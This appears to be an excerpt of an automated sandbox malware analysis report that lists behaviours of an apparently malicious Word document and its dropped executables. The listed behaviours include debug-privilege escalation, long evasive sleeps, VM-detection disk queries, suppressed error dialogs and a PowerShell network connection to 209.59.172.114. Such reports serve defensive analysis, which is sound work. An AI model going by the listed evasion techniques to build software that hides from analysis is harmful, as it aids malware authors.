Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Checks the free space of harddrivesShow sources
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeFile Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEThread delayed: delay time: 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -60s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -922337203685477s >= -60s
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe TID: 3684Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 3736Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exe TID: 3804Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 3864Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 4008Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 4016Thread sleep time: -5000s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 2540Thread sleep time: -120000s >= -60s
Queries disk information (often used to detect virtual machines)Show sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEFile opened: PhysicalDrive0

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\helphome.exeProcess information set: NOOPENFILEERRORBOX
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 209.59.172.114 80

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
